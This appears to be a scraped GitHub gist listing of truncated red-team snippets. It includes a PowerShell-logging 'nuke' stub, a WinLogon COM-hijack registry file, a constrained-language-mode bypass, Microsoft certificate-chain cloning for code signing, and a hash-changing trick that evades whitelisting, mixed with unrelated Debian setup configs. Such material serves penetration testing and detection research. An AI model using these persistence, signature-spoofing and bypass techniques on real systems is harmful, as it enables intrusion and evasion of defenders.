@H0K5
H0K5 / NukePSLogging.cpp
Created July 18, 2018 02:13 — forked from leechristensen/NukePSLogging.cpp
Nuke PS Logging
void Payload() {
    DWORD threadId;
    CreateThread(
        NULL,              // default security attributes
        0,                 // use default stack size
        MyThreadFunction,  // thread function name
        NULL,              // argument to thread function
        0,                 // use default creation flags
        &threadId);
}

First off: this is the first time I "seriously" reversed a kernel-mode NT driver, so keep that in mind when you read this.

The Komodia rootkit config is located in a certain registry entry that's hardcoded in the driver. For Qustodio, it's HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qwd\Data.

The config structure is simple enough. An array of the following structure:

DWORD type;
BYTE unknown[32]; // I don't see anywhere that the driver actually *reads* any of this part,
                  // at least, not after writing to it first.
@H0K5
H0K5 / httpshell.md
Created April 17, 2018 19:57
gistblog-blogpost:httpShell whitepaper

This article can also be found in Hack in the Box Magazine

## 0x00 Abstract

Discretion is a necessity when performing a penetration test. The job is to test a network's defenses as well as the security team's ability to detect and respond to an incident, while being as discreet as possible. Neohapsis Labs looked into the obstacles and solutions for developing a communication channel with a device residing in a protected and monitored network. This paper will discuss these findings. A new tool demonstrating some of these techniques will also be discussed. This paper will also speculate as to defensive solutions for such threats.

## Table of Contents

  • 0x01 -- Introduction
  • 0x02 -- Attacks and Defenses
  • 0x02.01 -- Network Address Translation / Port Address Translation (NAT/PAT)
  • 0x02.02 -- Ingress Port Filtering
@H0K5
H0K5 / winlogon.reg
Created March 19, 2018 13:48 — forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@H0K5
H0K5 / RunscripthelperBypass.ps1
Created March 14, 2018 11:43 — forked from mattifestation/RunscripthelperBypass.ps1
PowerShell weaponization for the runscripthelper.exe constrained language mode bypass
function Invoke-RunScriptHelperExpression {
<#
.SYNOPSIS
Executes PowerShell code in full language mode in the context of runscripthelper.exe.
.DESCRIPTION
Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode.
@H0K5
H0K5 / CertificateCloning.ps1
Created March 14, 2018 11:40 — forked from mattifestation/CertificateCloning.ps1
The steps required to clone a legitimate certificate chain and sign code with it.
# We'll just store the cloned certificates in current user "Personal" store for now.
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
$MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
$MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
$MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer
@H0K5
H0K5 / Copy-AuthenticodeSignedFile.ps1
Created March 14, 2018 11:37 — forked from mattifestation/Copy-AuthenticodeSignedFile.ps1
When supplied with an Authenticode-signed PowerShell script, Copy-AuthenticodeSignedFile generates the same signed, validated file but with a different file hash.
function Copy-AuthenticodeSignedFile {
<#
.SYNOPSIS
Creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature.
.DESCRIPTION
Copy-AuthenticodeSignedFile creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. This is used to bypass application whitelisting hash-based blacklist rules.
mv /etc/apt/sources.list /etc/apt/sources.list,old
echo "deb http://deb.debian.org/debian stretch main" >> /etc/apt/sources.list
echo "deb-src http://deb.debian.org/debian stretch main" >> /etc/apt/sources.list
echo "deb http://deb.debian.org/debian stretch-updates main" >> /etc/apt/sources.list
echo "deb-src http://deb.debian.org/debian stretch-updates main" >> /etc/apt/sources.list
echo "deb http://security.debian.org/debian-security/ stretch/updates main" >> /etc/apt/sources.list
echo "deb-src http://security.debian.org/debian-security/ stretch/updates main" >> /etc/apt/sources.list
################################################
# General Download, install, configure modules
################################################
$wd = $SCRIPT:MyInvocation.MyCommand.path | Split-Path -Parent
function new-restore(){
enable-computerrestore -drive C:\
checkpoint-computer -description "pre-pookiepack"
}
#### Contents of the preconfiguration file (for jessie)
### Localization
# Preseeding only locale sets language, country and locale.
d-i debian-installer/locale string fr_FR
# The values can also be preseeded individually for greater flexibility.
#d-i debian-installer/language string en
#d-i debian-installer/country string NL
#d-i debian-installer/locale string en_GB.UTF-8
# Optionally specify additional locales to be generated.